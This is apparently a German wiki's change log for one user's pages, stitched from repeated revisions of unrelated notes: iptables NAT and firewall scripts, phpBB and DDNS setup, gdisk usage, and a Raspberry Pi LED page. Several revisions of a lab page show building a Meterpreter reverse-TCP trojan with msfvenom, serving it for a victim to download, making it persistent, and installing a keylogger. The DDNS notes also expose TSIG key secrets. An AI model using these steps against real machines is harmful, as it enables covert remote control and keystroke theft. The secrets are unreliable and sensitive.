Eine weiter Form des NAT in iptables ist NETMAP. Statt wie bei MASQUERADE oder SNAT, ersetzt NETMAP die Quell Adresse nicht nur mit einer bestimmten Adresse, sondern bildet das gesamte Quell Netz auf ein anderes ab.

SNAT-Beispiel:
iptables -t nat -A POSTROUTING -j NETMAP -o eth0 -s 172.23.242.0/24 --to 195.145.95.0/24

DNAT-Beispiel:
iptables -t nat -A PREROUTING -j NETMAP -i eth0 -d 195.145.95.0/24 --to 172.23.242.0/24

;Verwendete Syntax
:'''-j NETMAP''': Aktion die auf Pakete ausgeführt wird, hier NETMAP
:

===DNAT, port forwarding===

Da das interne Netz nicht von außen angesprochen werden kann, wie es bei normalen Routern die ins Internet führen ja auch der Fall ist, bedient man sich hierfür einer Technik namens port forwarding, was bedeutet das ein Programm das über einen bestimmten Port mit dem Router kommuniziert an eine andere IP-Adresse und einen anderen Port weitergeleitet wird.
#!/bin/bash
case $1 in
start)
echo "starte firewall"
iptables -F
iptables -F -t nat
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -i eth0 -s 192.168.241.10 -p tcp --dport 22 -m state --state NEW -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT
iptables -A OUTPUT -o eth0 -p udp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp --dport 80 -m state --state NEW -j ACCEPT
iptables -A INPUT -i eth0 -p icmp --icmp-type 8 -j ACCEPT
iptables -t nat -A POSTROUTING -j MASQUERADE -o eth0 -s 172.23.242.0/24
'''iptables -t nat -A PREROUTING -j DNAT -i eth0 -p tcp --dport 3333 --to-dest 172.23.242.100:22'''
;;
stop)
echo "stoppe firewall"
iptables -F
iptables -F -t nat
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
;;
esac

;Verwendete Syntax
:''' PREROUTING''': Die Aktion soll noch vor einer Routingentscheidung durchgeführt werden

====DNAT für alle Protokolle/Ports - one IP====

iptables -t nat -A PREROUTING -d $1stIP -j DNAT --to-destination $2ndIP

Alle Pakete die an die Adresse $1stIP gehen werden an die Adresse $2nIP umgeleitet

====DNAT auf einen Port====

iptables -t nat -A PREROUTING -p tcp -d $1stIP --dport $EINGANGSPORT -j DNAT --to-destination $2ndIP

Alle Pakete die an den Port $EINGANGSPORT der Adresse $1stIP gehen werden an die Adresse $2nIP umgeleitet

====DNAT Portumleitung====

iptables -t nat -A PREROUTING -p tcp -d $1stIP --dport $EINGANGSPORT -j DNAT --to-destination $2ndIP:$WUNSCHPORT

Alle Pakete die an den Port $EINGANGSPORT der Adresse $1stIP gehen werden an den Port $WUNSCHPORT der Adresse $2nIP umgeleitet

(Wenn die Destination IP der Host ist, reicht die Schnittstellenangabe!
iptables -t nat -A PREROUTING -p tcp -i $WANDEV --dport $EINGANGSPORT -j DNAT --to-destination $2ndIP:$WUNSCHPORT

====FORWARD====

iptables -t nat -A PREROUTING -j DNAT -i $WAN -p tcp --dport $EINGANGSPORT --to $2ndIP:$WUNSCHPORT
iptables -A FORWARD -p tcp -d $2ndIP --dport $WUNSCHPORT -j ACCEPT -m state --state NEW

==== FULL NAT ====
iptables -t nat -A PREROUTING -d $1stIP -j DNAT --to-destination $2ndIP
iptables -t nat -A POSTROUTING -s $2ndIP -j SNAT --to-source $1stIP

;Verwendete Syntax
:'''PREROUTING''': Paket wird nach der Routingentscheidung geändert
:'''-j DNAT''': Aktion die auf Pakete ausgeführt wird, hier DNAT
:'''--to-dest 172.23.242.100:22''': IP-Adresse und Port zu denen weitergeleitet wird
:In einem Satz:
:Ändere bei allen Paketen die auf eth0 ankommen und den Port 3333 ansprechen die Ziel Adresse zu 172.23.242.100 und Port zu 22

==Logging==

Damit wir sehen können was so alles an unserer Firewall abprallt, nicht nur um Störenfriede zu erkennen, sondern auch um zu sehen was wir vielleicht für uns freischalten müssen, können wir ein logging einrichten das automatisch alle Pakete die nicht durchgelassen wurden an den syslog deamon weitergeben der die Vorkommnisse in die syslog schreibt.
#!/bin/bash
case $1 in
start)
echo "starte firewall"
iptables -F
iptables -F -t nat
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -i eth0 -s 192.168.241.10 -p tcp --dport 22 -m state --state NEW -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT
iptables -A OUTPUT -o eth0 -p udp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp --dport 80 -m state --state NEW -j ACCEPT
iptables -A INPUT -i eth0 -p icmp --icmp-type 8 -j ACCEPT
iptables -t nat -A POSTROUTING -j MASQUERADE -o eth0 -s 172.23.242.0/24
iptables -t nat -A PREROUTING -j DNAT -i eth0 --dport 3333 --to-dest 172.23.242.100:22
'''iptables -A INPUT -j LOG --log-prefix "--iptables-in--"'''
'''iptables -A OUTPUT -j LOG --log-prefix "--iptables-out--"'''
'''iptables -A FORWARD -j LOG --log-prefix "--iptables-for--"'''
;;
stop)
echo "stoppe firewall"
iptables -F
iptables -F -t nat
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
;;
esac
Diese Zeilen sollten ganz am Ende bleiben, damit auch sichergestellt ist das nur Pakete die alle Regeln durchlaufen haben dort landen.

;Verwendete Syntax
:'''-j LOG''': Aktion die auf Pakete ausgeführt wird, hier LOG
:'''--log-prefix "--iptables-in--"''': Schreibt ''--iptables-in--'' , vor jedes Paket das am INPUT verworfen wurde,
==logging file ändern==
*[[Rsyslog]]

=netstat-nat and conntrack=
*[[netstat-nat]] (vielleicht veraltet)
*[[conntrack]]
==contrack table löschen==
*conntrack -F

=DNAT weiterleitung bis auf einen port=

#!/bin/bash
SSHPORT="4567"
1stIP="WEITERLEITUNGS-IP"
2ndIP="CONNECT-IP"
case $1 in
start)
echo "starte firewall"
iptables -F
iptables -F -t nat
iptables -F -t mangle
iptables -X
iptables -X -t nat
iptables -X -t mangle
iptables -t nat -N innat
iptables -t nat -A innat -j RETURN -p tcp --dport $SSHPORT
iptables -t nat -A innat -j DNAT --to $1stIP
iptables -t nat -A PREROUTING -d $2ndIP -j innat
iptables -t nat -A POSTROUTING -j SNAT -s $1stIP --to $2ndIP
;;
stop)
echo "stoppe firewall"
iptables -F
iptables -F -t nat
iptables -F -t mangle
iptables -X
iptables -X -t nat
iptables -X -t mangle
;;
esac

;Verwendete Syntax
:'''-N innat''': Hier wird eine neue Kette mit dem Namen "innat" angelegt

=mark=

iptables -t mangle -A PREROUTING -j MARK -p tcp --dport 25 --set-mark 9
iptables -t nat -A PREROUTING -j REDIRECT -p tcp --dport 25 --to 52525
iptables -A INPUT -j ACCEPT -m mark --mark 9

Alle ankommenden Pakete, die den angegebenen Bedingungen entsprechen (hier: TCP-Pakete mit Zielport 25) werden markiert. Es sind bis zu 32 verschiedene Markierungen möglich.

Anhand dieser Markierungen können die Pakete nun, wie in unserem Beispiel auf einen anderen Port (52525) umgeleitet werden, ohne, dass dieser Port nach aussen geöffnet werden muss.

Weiterhin werden im obigen Beispiel alle eingehenden Pakete, die den Marker 9 targen automatisch von der Firewall durchgelassen.

=Mangle=
==MSS Reduktion==
iptables -t mangle -A FORWARD -p tcp -i $LAN -o $WAN --tcp-flags SYN,RST SYN -j TCPMSS --set-mss 1400
*https://www.zeitgeist.se/2013/11/26/mtu-woes-in-ipsec-tunnels-how-to-fix/

==Markieren und Freischalten==
iptables -t mangle -A PREROUTING -j MARK -i $WAN -p tcp --dport 22 -d $TELIP --set-mark 0x8
iptables -t nat -A PREROUTING -j DNAT -i $WAN -p tcp --dport 22 -d $TELIP --to 192.168.244.1:8472
iptables -t filter -A FORWARD -j ACCEPT -m mark --mark 0x8

=VPN Tunnel zulassen=

Über den switch policy ist es möglich alle Pakete, die zu einem bestimmten VPN-Tunnel gehören durch die Firewall zu lassen.

==ACHTUNG!==

Dies funktioniert nicht, wenn der Tunnel genattet wird!

==Ein VPN-Tunnel==

iptables -A FORWARD -i $LAN -o $WAN -s $LEFTNET -d $RIGHTNET -m policy --dir out --pol ipsec -m state --state NEW -j ACCEPT

iptables -A FORWARD -i $WAN -o $LAN -s $RIGHTNET -d $LEFTNET -m policy --dir in --pol ipsec -m state --state NEW -j ACCEPT

;Verwendete Syntax
:'''$LAN''': Bezeichnet die dem Netzwerk zugewandte Schnittstelle
:'''$WAN''': Bezeichnet die dem Internet zugewandte Schnittstelle
:'''$LEFTNET''': Bezeichnet das auf unserer Seite hinter der Firewall liegende Netzwerk
:'''$RIGHTNET''': Bezeichnet das auf der anderen Seite des VPN-Tunnels liegende Netzwerk
:'''-m policy''': Ruft das Modul "policy" auf
:'''--pol ipsec''': Bezeichnet die zu betrachtende policy. Hier IPSEC
:'''--dir in/out''': Legt die Richtung fest in welcher Richtung die policy betrachtet werden soll

iptables -A INPUT -i eth0 -p esp -m state --state NEW -j ACCEPT

ESP-Protokoll zulassen

==Mehrere VPN-Tunnel==

Wenn wir auf unserer Firewall mehrere Tunnel haben, die wir entsprechend filtern wollen, bietet es sich an eine neue Kette zu erstellen. Das Ergebnis ist zwar in beiden Fällen das Gleiche aber durch die Kette wird unsere Firewall übersichtlicher und wir sparen uns auch einiges an Schreibarbeit.

<pre>
iptables -N vpn-in-accept
iptables -A vpn-in-accept -m policy --dir in --pol ipsec -m state --state NEW -j ACCEPT
iptables -A vpn-in-accept -j RETURN
iptables -N vpn-out-accept
iptables -A vpn-out-accept -m policy --dir out --pol ipsec -m state --state NEW -j ACCEPT
iptables -A vpn-out-accept -j RETURN
</pre>

Und nun wenden wir die neue Kette an

<pre>
iptables -A FORWARD -i $LAN -o $WAN -s $LEFTNET -d $RIGHTNET -j vpn-out-accept
iptables -A FORWARD -i $WAN -o $LAN -s $RIGHTNET -d $LEFTNET -j vpn-in-accept
</pre>
==Alle Pakete von einem VPN-Tunnel zulassen==

Hier werden alle Pakete die von dem VPN Tunnel kommen zugelassen.

<pre>
iptables -A FORWARD -i $WAN -m policy --pol ipsec --mode tunnel --dir in -j ACCEPT
</pre>

=limit module=

==modul laden==
in jeder regel in der wir limits benutzen wollen müssen wir das modul laden
-m limit
==optionen ==
*iptables -A INPUT -p icmp -m icmp -m limit --limit 4/second --limit-burst 10 -j ACCEPT

Das bedeutet folgendes:

#Es dürfen 4 Pakete pro Sekunde durchgelassen werden.
#Wenn mehr als 4 Pakete pro Sekunde kommen, dürfen insgesamt 10 Pakete ohne Limitierung durch.
#Nach diesen 10 Paketen, dürfen wieder nur 4 pro Sekunde durch.
#Wenn weniger als 4 Pakete pro Sekunde ankommen, wird die Differenz wieder frei (limit von 4-X Pakete/s) und steht wieder zum überziehen bereit.

--limit
als Begrenzung optionen kann man definieren wie viele aktionen pro zeiteinheit zugelassen werden
1/second,2/minute,3/hour,4/day, oder 1/s,2m/,3/h,4/d
–limit-burst
definiert wie viele aktionen mehr als die limitierung zugelassen werden bevor das definierte limit einsetzt

diese regel lässt bis zu 10 Verbindungen in einer Sekunde zu wird dies überschritten setzt die Limitierung von 4 ICMP Packeten pro Sekunden ein.
Für jede Sekunde in der das Limit von 4 packeten nicht erreicht wird werden die übrigen erlaubten pakete dem burst wider gut geschrieben
das heißt wen der burst voll ist dauert es 2,5 sekunden (ohne das icmp packete kommen) bis der burst wider seinen Ursprungswert ereicht oder 5 sekunden in denen pro sekunden 2 packete kommen

==DoS atacken==
Beschränkt die Anzahl der neuen tcp Verbindungen die wir aufbauen können auf 1 pro Sekunde

*iptables -A INPUT -p icmp -m icmp --icmp-type address-mask-request -j DROP
*iptables -A INPUT -p icmp -m icmp --icmp-type timestamp-request -j DROP
*iptables -A INPUT -p icmp -m icmp -m limit --limit 1/second -j ACCEPT

=ftp=
==Vorrausetzung==
*iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT

Basically newer kernels ( >= 4.7 ) are deprecating the automatic helper module's port assignment in favor of explicit rules.

Short fix to get the old behaviour:

*echo 1 > /proc/sys/net/netfilter/nf_conntrack_helper

Sowohl aktives als auch passives FTP wird nach laden der Module über den RELATED Status gehandled.
Module laden
*modprobe -v nf_conntrack_ftp
*modprobe -v nf_nat_ftp

==Client auf Server im Internet==
*iptables -A FORWARD -i $LAN -o $WAN -p tcp --dport 21 -m state --state NEW -j ACCEPT

==FTP Server im LAN mit Inside NAT==

*iptables -A FORWARD -i $WAN -o $LAN -p tcp --dport 21 -d $FTPSERVER_LAN -m state --state NEW -j ACCEPT
*iptables -t nat -A PREROUTING -j DNAT -i $WAN -p tcp --dport 21 --to-dest $FTPSERVER_LAN

Phpbb

2019-10-09T09:23:01Z

Joshua.schreiner: Die Seite wurde neu angelegt: „ == phpBB == um eine Forum mit phpBB zu erstellen benötigt man als Grundlagen einen Server mit apache oder einem andern Webserver genau so wie mysql und eine…“

== phpBB ==

um eine Forum mit phpBB zu erstellen benötigt man als Grundlagen einen Server mit apache oder einem andern Webserver genau so wie mysql und eine erstellte Datenbank so wie einen Benutzer ebnfalls wird php7 benötigt so wie folgende Module

apt-get install php7.0 php7.0-mysql php7.0-curl php7.0-json php7.0-cgi libapache2-mod-php7.0 php7.0-mcrypt php7.0-xmlrpc php7.0-gd php7.0-mbstring php7.0 php7.0-common php7.0-xmlrpc php7.0-soap
php7.0-xml php7.0-intl php7.0-cli php7.0-ldap php7.0-zip php7.0-readline php7.0-imap php7.0-tidy php7.0-recode php7.0-sq php7.0-intl

wen dies vorhanden ist kann phpBB heruntergeladen werden

wget https://download.phpbb.com/pub/release/3.2/3.2.8/phpBB-3.2.8.zip

danach endpacken wir die Datei

unzip phpBB-3.2.2.zip

die Datei wird dann zu HTML geschoben

mv phpBB3 /var/www/

und wechseln in dieses Verzeichnis

cd /var/www/

nun ändern wir den Besitzer und die rechte

chown -R www-data.www-data phpBB3

und so

chmod -R 775 phpBB3

jetzt wird ein local host für den phpbb erstellt in vim /etc/apache2/sites-available/phpbb.conf

<VirtualHost *:80>
ServerName www.linuxhelp1.com
DocumentRoot /var/www/phpBB3/
<Directory /var/www/phpBB3/>
AllowOverride All
allow from all
</Directory>
</VirtualHost>

nun aktivieren wir den Zugang

a2ensite phpbb.conf

und deaktivieren den default Zugang

a2dissite 000-default.conf

jetzt wird das rewrite module

a2enmod rewrite

Restart apache

systemctl restart apache2

nun kann die Installation des Forums über den Browser durchgeführt werden dafür muss man sich über die ip oder die Domain auf den Server verbinden.
die Installation an sich ist einfach gehalten auf der ersten Seite wird der Account des Admin erstellt
auf der zweiten Seite wird die Datenbank eingetragen danach folgen noch ein paar Server Optionen und ein paar email configurationen
danach ist die Installation abgeschlossen

Grundlagen der boolesche Algebra

2019-09-18T09:51:20Z

Joshua.schreiner: Die Seite wurde geleert.

Grundlagen der boolesche Algebra

2019-09-18T09:50:42Z

Joshua.schreiner: Die Seite wurde neu angelegt: „Zu den grundlagen der booleschen Algebra gehören drei verschiedene arten == ANO == Datei:file:///home/joshua.schreiner/Schreibtisch/Bildschirmfoto_2019…“

Zu den grundlagen der booleschen Algebra gehören drei verschiedene arten

== ANO ==
[[Datei:file:///home/joshua.schreiner/Schreibtisch/Bildschirmfoto_2019-09-18_11-41-20.png]]

== OR ==
[[Datei:file:///home/joshua.schreiner/Schreibtisch/Bildschirmfoto_2019-09-18_11-42-43.png]]

== XOR ==
[[Datei:file:///home/joshua.schreiner/Schreibtisch/Bildschirmfoto_2019-09-18_11-43-42.png]]

Ddns josh

2019-09-17T08:28:27Z

Joshua.schreiner:

'''DDNS'''

um ein DDNS erstellen zu können muss zuerst ein Key erstellt werden dies geht mit

dnssec-keygen -a HMAC-MD5 -b 512 -n HOST example.com

Es wurde die Datei example.com.+xxx+xxxxx.private. erstellt

>secret ""Private-key-format: v1.2
>Algorithm: 157 (HMAC_MD5)
>Key: testkey==
>Bits: AAA=

in der neu erstellten Datei steht unter Key: der erstellt Key
dieser muss nach named.conf.local kopiert werden hinter secret

key example.com {
algorithm HMAC-MD5;
secret "testkey==";
};

Jezt werden noch in /etc/bind/named.conf.local die Zonen noch geändert

>zone example.com {
>type master;
>file "example.com";
>allow-update {
>key example.com ;
>};
>};

>zone "100.80.10.in-addr.arpa" {
>type master;
>file "100.80.10.in-addr.arpa";
>allow-update {
>key vulkan.int ;
>};

=Testen=
*nsupdate -v
<pre>
> key vulkan.int mh8rQqaZF3rdGLJfRU7xvI6dHM6tGBJQwYvf6BfYvH+81N2aWhmxri4zuHzYCEguzyYkYRiI58N7lY7cqZ1qEg==
> server 10.80.100.10
> update delete schluri.vulkan.int
> update add schluri.vulkan.int 300 A 10.80.100.141
> send
</pre>
*STRG+D

Der test mit einem Script
[[ddns basic]]

nun werden noch ein paar sachen in der config des DHCP geändert
als erstes aktivieren wir die updates

> ddns-updates on;#

als nächstes kopieren wir den Key

>key "ddns-key" {
>algorithm HMAC-MD5;
>secret "pAY61K6RuV0TPfd0fTBMhA==";
>};

dazu muss der Key noch beiden Zonen zugewiesen werden

>zone cloud.net {
>primary 127.0.0.1;
>key "ddns-key";
>}

>zone 0.0.10.in-addr.arpa {
>primary 127.0.0.1;
>key "ddns-key";
>}

nun werden die zugehörige Domainnamen ind diedhcpd.conf eingetragen

>subnet 10.80.100.0 netmask 255.255.255.0 {
>range 10.80.100.101 10.80.100.150;
>#ddns-domainname "vulkan.int";
>option domain-name-servers 10.80.100.10, 10.80.100.11;
>option routers 10.80.100.1;
>}

Ddns josh

2019-09-16T12:52:31Z

Joshua.schreiner: Die Seite wurde neu angelegt: „'''DDNS''' um ein DDNS erstellen zu können muss zuerst ein Key erstellt werden dies geht mit dnssec-keygen -a HMAC-MD5 -b 512 -n HOST example.com Es wurde…“

'''DDNS'''

um ein DDNS erstellen zu können muss zuerst ein Key erstellt werden dies geht mit

dnssec-keygen -a HMAC-MD5 -b 512 -n HOST example.com

Es wurde die Datei Kexample.com.+xxx+xxxxx.private. erstellt

secret ""Private-key-format: v1.2
Algorithm: 157 (HMAC_MD5)
Key: testkey==
Bits: AAA=

in der neu erstellten Datei steht unter Key: der erstellt Key
dieser muss nach named.conf.local kopiert werden hinter secret

key example.com {
algorithm HMAC-MD5;
secret "testkey==";
};

Jezt wird noch in der named.conf der zonen eintrag geändert

zone example.com {
type master;
file "example.com";
allow-update {
key example.com ;
};
};
zum schluss noch mit nsupdate updaten mit einem skript

[[ddns basic]]

To learn

2019-09-16T12:22:20Z

Joshua.schreiner:

*[[To learn misc]]
*[[To learn linux]]
*[[To learn network]]
*[[To learn linux network]]
*[[To learn bash]]
*[[To learn linux packet managment]]
*[[To learn Server]]
*[[joshua]]
*[[to learn antworten]]
*[[gdisk josh]]
*[[ddns josh]]

To learn

2019-09-16T12:22:03Z

Joshua.schreiner:

Raspberry LED GPIO Pins

2019-09-10T14:47:30Z

Joshua.schreiner: Die Seite wurde neu angelegt: „ == Einschalten einer LED mit den GPIO-Pins Ihres Raspberry Pi's.== '''Das Breadboard''' Die Breadboard ist eine Möglichkeit, elektronische Komponenten mitei…“

== Einschalten einer LED mit den GPIO-Pins Ihres Raspberry Pi's.==

'''Das Breadboard'''
Die Breadboard ist eine Möglichkeit, elektronische Komponenten miteinander zu verbinden, ohne sie zusammenlöten zu müssen
Die Löcher auf der Lochrasterplatine sind in einem Muster verbunden.
so sind alle Löscher in der ersten Reihe miteinander verbunden
ebenso sind auch in der zweiten Reihe die Löscher alle miteinander verbunden
die erste und die zweite Reihe sind jedoch nicht miteinander verbunden.
das gleiche gilt auch führ die beiden Reihen ganz unten

zwischen den ersten und den letzten Rhein ist es anders dort sind alle Löcher in jeder Spalte miteinander verbunden.

'''LED'''
Beim genaueren anschauen der LED`s wird auffallen das eine Seite länger ist als die andere.Der längere Draht auch bekannt als Anode ist immer mit der positiven Versorgung verbunden der kleiner Draht ist bekannt als Kathode sie ist mit der negativen Seite der Versorgung verbunden

'''Der Widerstand'''
Widerstände sind eine Möglichkeit, die Menge an Strom, die durch einen Stromkreis fließt, zu begrenzen; insbesondere begrenzen sie die Menge an "Strom", die fließen darf. Das Widerstandsmaß wird als Ohm bezeichnet (Ω), und je größer der Widerstand, desto mehr begrenzt er den Strom. Der Wert eines Widerstandes ist durch farbige Streifen entlang der Länge des Widerstandskörpers gekennzeichnet.
um unsere LED zum betreiben verwenden wir einen Wiederstand von 330 Ohm

To learn

2019-09-10T08:47:11Z

Joshua.schreiner:

To learn

2019-09-05T06:53:48Z

Joshua.schreiner:

Gdisk josh

2019-09-04T10:54:58Z

Joshua.schreiner:

'''Partitionstabellen und Partitionen auflisten'''

# gdisk -l /dev/sda

'''Partitionstabelle sichern und wiederherstellen'''

Bevor Änderungen an einer Festplatte gemacht werden sollten die Partitionstabelle und das Partitionsschema des Laufwerks sichern.
Eine Sicherung kann auch verwendet werden um ein Patrtitionslayout auf mehrere Laufwerke zu kopieren.
Mit sgdisk kann eine Binärsicherung erstellt werden.

# sgdisk -b=sgdisk-sda.bin /dev/sda

Hier wird die Partitionstabelle /dev/sda als file sgdisk-sda.bin gesichert

Das Backup kann Später wieder hergestellt werden mit:

# sgdisk -l=sgdisk-sda.bin /dev/sda

Wenn das Partitionslayout des aktuellen Gerätes auf ein anderes Laufwerk übernommen werden soll in diesem beispiel /dev/sda auf /dev/sdc geht dies mit

# sgdisk -R=/dev/sdc /dev/sda

'''Erstellen von Partitionstabellen und Partitionen'''

Um gdisk zu verwenden wird der Befehl gdisk mit dem Namen des block device verwendet in diesem Beispiel /dev/sda.

# gdisk /dev/sda

'''Das erstellen einer neuen Tabelle'''
wenn eine neue Partitionstabelle erstellt wird auf einer Festplatte auf der bereits Daten sind so werden diese gelöscht.

Um eine neue GUID-Partitionstabelle zu erstellen muss in der Eingabeaufforderung ('''o''') eingegeben werden

'''Erstellen einer neuen Partitionen'''

um eine neue Partition zu erstellen drücken sie in der Eingabeaufforderung ('''n''')
es muss die Partitionsnummer der erste und der letzte Sektor so wie Partitionstyp
Die Partitionsnummer ist die Nummer die einer Partition zugeordnet ist zum Beispiel eine partition mit der Nummer 1 auf der Festplatte
wäre /dev/sda1 falls die Nummern nicht mit der Reihenfolge übereinstimmen können sie sortiert werden.

'''Partitionstyp'''

Der Partitionstyp wird ausgewählt indem der interne typcode von gdisk eingegeben wird (8300 ist das standardmäßige Linux filesystem)
mit ('''L''') wird die komplette liste der Codes angezeigt

'''Änderungen auf die Festplatte schreiben'''

Schreiben Sie die Tabelle auf die Festplatte und verlassen Sie sie über den Befehl w.

gdisk hat die Möglichkeit, MBR- und BSD-Disklabels ohne Datenverlust in GPT zu konvertieren.Bei der Konvertierung werden alle primären MBR-Partitionen und die logischen Partitionen zu GPT-Partitionen.Nach der Konvertierung muss der Bootloader neu installiert werden, um ihn so zu konfigurieren, dass er von GPT bootet.

Um eine MBR-Partitionstabelle mit der Hilfe von sgdisk in GPT zu konvertieren verwenden sie

# sgdisk -g /dev/sda

Um GPT in MBR zu konvertieren wird ('''-m''') genutzt.

# sgdisk -m /dev/sda

dabei ist zu beachten das nicht mehr als vier PArtitionen von GPT in MBR konvertiert werden können.

'''Partitionen sortieren'''

Dies gilt für den Fall, dass eine neue Partition im Bereich zwischen zwei Partitionen erstellt oder eine Partition gelöscht wird. In diesem Beispiel wird /dev/sda verwendet.

# sgdisk -s /dev/sda

'''Erweitern eines GPT-Laufwerks'''

Nach dem Vergrößern einer Festplatte z.b. auf einer Virtuellen Maschine wird der neue Speicherplatz nicht sofort nutzbar sein da GPT die Daten am Ende der Festplatte hält. Der Backup-GPT-Header muss an das neue Ende der Festplatte verschoben werden

# sgdisk -e /dev/sda

'''GPT-Header wiederherstellen'''

Falls der Haupt-GPT-Header beschädigt wird Können Sie mit gdik einen von dem anderen wiederherstellen

# gdisk /dev/sda

Wählen Sie r für Wiederherstellungs- und Transformationsoptionen (nur für Experten). Wählen Sie dort entweder

b: Backup-GPT-Header verwenden (Hauptteil neu aufbauen)
d: Verwendung des GPT-Hauptkopfes (Backup neu aufbauen)
wen dies getan ist kann die änderung mit w wieder auf die Tabelle geschrieben werden

Gdisk josh

2019-09-04T09:39:54Z

Joshua.schreiner:

Gdisk josh

2019-09-04T09:24:16Z

Joshua.schreiner:

Gdisk josh

2019-09-04T07:35:25Z

Joshua.schreiner:

Gdisk josh

2019-09-04T07:34:55Z

Joshua.schreiner: Die Seite wurde neu angelegt: „Partitionstabellen und Partitionen auflisten # gdisk -l /dev/sda Partitionstabelle sichern und wiederherstellen Bevor Änderungen an einer Festplatte gema…“

Partitionstabellen und Partitionen auflisten

# gdisk -l /dev/sda

Partitionstabelle sichern und wiederherstellen

Bevor Änderungen an einer Festplatte gemacht werden sollten die Partitionstabelle und das Partitionsschema des Laufwerks sichern.
Eine Sicherung kann auch verwendet werden um ein Patrtitionslayout auf mehrere Laufwerke zu kopieren.
Mit sgdisk kann eine Binärsicherung erstellt werden.

# sgdisk -b=sgdisk-sda.bin /dev/sda

Hier wird die Partitionstabelle /dev/sda als file sgdisk-sda.bin gesichert

Das Backup kann Später wieder hergestellt werden mit:

# sgdisk -l=sgdisk-sda.bin /dev/sda

Wenn das Partitionslayout des aktuellen Gerätes auf ein anderes Laufwerk übernommen werden soll in diesem beispiel /dev/sda auf /dev/sdc geht dies mit

# sgdisk -R=/dev/sdc /dev/sda

To learn

2019-09-04T06:38:09Z

Joshua.schreiner:

To learn

2019-09-04T06:37:45Z

Joshua.schreiner:

Metasploit & armitage keylogger

2019-09-02T10:57:25Z

Joshua.schreiner:

start keylogger

[[Datei:keyloger300.png]]

on the left side we look live in the file in which we record

on the right is the infected Windows machine

[[Datei:400 keyloger.png]]

Metasploit & armitage trojaner

2019-09-02T10:55:26Z

Joshua.schreiner: /* What can you do */

Setup Hacker
Kali linux
ip: 192.168.242.91

Setup target
Windows 7 Domain Rechner
Benutzer: Admin
ip: 192.168.242.76

=Create trojan=
*LHOST="10.81.1.1"
*LPORT="7777"
LHOST is the computer that the client will connect later ...
*msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT --format=exe > program.exe

[[Datei:7 trojaner.png]]

=defer the program to the target=
the target must be made to run the program we offer in this example simply the file as download to

cp program.exe /var/www/html/
rm /var/www/html/index.html
ifconfig
netstat -lntp
service apache2 restart

[[Datei:8 opfer.png]]

on the target page

[[Datei:12 schadeware.png]]

=take control=

now we start metasploit and then armitage (left bar)

[[Datei:mframe.png]]

Preserve default setting Confirm further messages simply

[[Datei:amriamstarten.png]]

[[Datei:1armitagestarten.png]]

When Armitage is started, we create a server to listen to
*payload
**windows
***metapreter

Here we adapt the LPORT

and wait for our target to connect

Now the target computer appears on the top right

(durch links klick auswählen)

=Permanently infect=

Next we want to save the Trojan permanently

we search for persist (double-click) and specify a new port

[[Datei:200persist.png]]

If the computer is restarted, we only need to listen on the new port and connect again

this can take a few minutes

=What can you do=
Now there are many possibilities
*Right click infected pc
**meterpreter
***explore
Here we can view processes or files, infect other processes or install a keylogger, etc

=short example keylogger=

[[metasploit & armitage keylogger]]

Metasploit & armitage trojaner

2019-09-02T10:53:34Z

Joshua.schreiner: /* Permanently infect */

Setup Hacker
Kali linux
ip: 192.168.242.91

Setup target
Windows 7 Domain Rechner
Benutzer: Admin
ip: 192.168.242.76

=Create trojan=
*LHOST="10.81.1.1"
*LPORT="7777"
LHOST is the computer that the client will connect later ...
*msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT --format=exe > program.exe

[[Datei:7 trojaner.png]]

=defer the program to the target=
the target must be made to run the program we offer in this example simply the file as download to

cp program.exe /var/www/html/
rm /var/www/html/index.html
ifconfig
netstat -lntp
service apache2 restart

[[Datei:8 opfer.png]]

on the target page

[[Datei:12 schadeware.png]]

=take control=

now we start metasploit and then armitage (left bar)

[[Datei:mframe.png]]

Preserve default setting Confirm further messages simply

[[Datei:amriamstarten.png]]

[[Datei:1armitagestarten.png]]

When Armitage is started, we create a server to listen to
*payload
**windows
***metapreter

Here we adapt the LPORT

and wait for our target to connect

Now the target computer appears on the top right

(durch links klick auswählen)

=Permanently infect=

Next we want to save the Trojan permanently

we search for persist (double-click) and specify a new port

[[Datei:200persist.png]]

If the computer is restarted, we only need to listen on the new port and connect again

this can take a few minutes

=What can you do=
jetzt gibt es viele Möglichkeiten
*Rechtsklick infizierter pc
**meterpreter
***explore
hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw

=short example keylogger=

[[metasploit & armitage keylogger]]

Metasploit & armitage trojaner

2019-09-02T10:35:29Z

Joshua.schreiner: /* take control */

Setup Hacker
Kali linux
ip: 192.168.242.91

Setup target
Windows 7 Domain Rechner
Benutzer: Admin
ip: 192.168.242.76

=Create trojan=
*LHOST="10.81.1.1"
*LPORT="7777"
LHOST is the computer that the client will connect later ...
*msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT --format=exe > program.exe

[[Datei:7 trojaner.png]]

=defer the program to the target=
